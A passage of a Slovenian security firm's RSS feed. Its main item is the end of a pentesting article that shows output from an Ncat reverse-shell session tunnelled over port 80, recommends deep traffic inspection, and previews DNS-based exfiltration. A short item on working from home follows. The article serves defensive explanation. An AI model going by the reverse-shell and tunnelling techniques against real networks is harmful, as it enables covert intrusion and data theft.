<span style="color: #003366;"><em>Ncat: Connection from CLIENT_IP</em></span><br />
<span style="color: #003366;"><em>…</em></span><br />
<span style="color: #003366;"><em>&gt;whoami</em></span><br />
<span style="color: #003366;"><em>&gt;siq\mmesojednik</em></span></p>
</td>
</tr>
</tbody>
</table>
<p>Iz zajetega prometa (uporaba orodja Wireshark) je jasno razvidno tuneliranje ukazne lupine preko transportnih vrat TCP/80, ki so v običajnih okoliščinah namenjena spletni komunikaciji (HTTP):</p>
<p><img loading="lazy" decoding="async" class="alignnone size-large wp-image-18154" src="https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic-1024x195.png" alt="" width="1024" height="195" srcset="https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic-1024x195.png 1024w, https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic-300x57.png 300w, https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic-768x147.png 768w, https://www.siq.si/wp-content/uploads/2020/05/Captured-traffic.png 1090w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<p>Varnostni sistemi naslednje generacije imajo prav v ta namen vgrajeno sposobnost prepoznave protokolnih in/ali aplikativnih odstopanj na poljubnih transportnih poteh. Organizacije z uveljavljeno učinkovito strategijo obrambe pred najbolj naprednimi kibernetskimi napadi izvajajo podrobno inspekcijo vsakršne interakcije z uporabniki storitev, neodvisno od uporabe:</p>
<ul>
<li>transportnega protokola (TCP ali UDP),</li>
<li>transportnih vrat (TCP/80, TCP/443) ali</li>
<li>šifriranja transportne poti (HTTP, HTTPS).</li>
</ul>
<p>Ne pozabimo. Vsi od zgoraj naštetih komunikacijskih kanalov so lahko v primeru šibke protokolne in aplikativne inspekcije napadalčevo okno priložnosti za neopazno:</p>
<ul>
<li>dostavo škodljive kode,</li>
<li>njeno nadaljnje širjenje in / ali plemenitenje in</li>
<li>odtekanje občutljivih podatkov.</li>
</ul>
<p>Pentesterji se na terenu le poredko srečujemo z informacijskimi okolji z izrazito selektivno odhodno varnostno politiko, ki bi v celoti preprečila uporabo omenjenih tehnik. In vendar smo pripravljeni tudi na izjemne okoliščine, kjer pentesterjeva (napadalčeva) interakcija z zunanjimi spletnimi viri ni dovoljena ali verjetna.</p>
<p>V drugem delu (2. del) serije prispevkov bomo pokazali naprednejšo tehniko izrabe protokola DNS, uporaba katerega v večini organizacij velja za nepogrešljivo. Uspešna zloraba protokola na drugi strani omogoča napadalčev oddaljen nadzor, celovito upravljanje in odtekanje podatkov tudi iz okolij z vzpostavljeno izjemno konservativno varnostno politiko. Stay tuned …</p>
<p>The post <a href="https://www.siq.si/novice/tudi-hekerji-nosijo-zascitne-maske-1-del/">Tudi hekerji nosijo (zaščitne) maske, 1. del</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Delo od doma – nova običajna praksa?</title>
		<link>https://www.siq.si/novice/delo-od-doma-nova-obicajna-praksa/</link>
		
		<dc:creator><![CDATA[Nina Erjavec]]></dc:creator>
		<pubDate>Mon, 16 Mar 2020 06:00:43 +0000</pubDate>
				<category><![CDATA[Informacijske tehnologije]]></category>
		<category><![CDATA[SIQ]]></category>
		<guid isPermaLink="false">https://www.siq.si/novice/</guid>

					<description><![CDATA[<p>Kaj moramo storiti za zagotavljanje varnih fizičnih razmer za delo, vemo. Kako pa je s kibernetsko varnostjo?</p>
<p>The post <a href="https://www.siq.si/novice/delo-od-doma-nova-obicajna-praksa/">Delo od doma – nova običajna praksa?</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Kaj moramo storiti za zagotavljanje varnih fizičnih razmer za delo, vemo. Kako pa je s kibernetsko varnostjo?</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-17261" src="https://www.siq.si/wp-content/uploads/2020/03/Kibernetska-varnost-pri-delu-na-domu.jpg" alt="" width="1024" height="650" srcset="https://www.siq.si/wp-content/uploads/2020/03/Kibernetska-varnost-pri-delu-na-domu.jpg 1024w, https://www.siq.si/wp-content/uploads/2020/03/Kibernetska-varnost-pri-delu-na-domu-300x190.jpg 300w, https://www.siq.si/wp-content/uploads/2020/03/Kibernetska-varnost-pri-delu-na-domu-768x488.jpg 768w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></p>
<p>The post <a href="https://www.siq.si/novice/delo-od-doma-nova-obicajna-praksa/">Delo od doma – nova običajna praksa?</a> appeared first on <a href="https://www.siq.si">SIQ</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
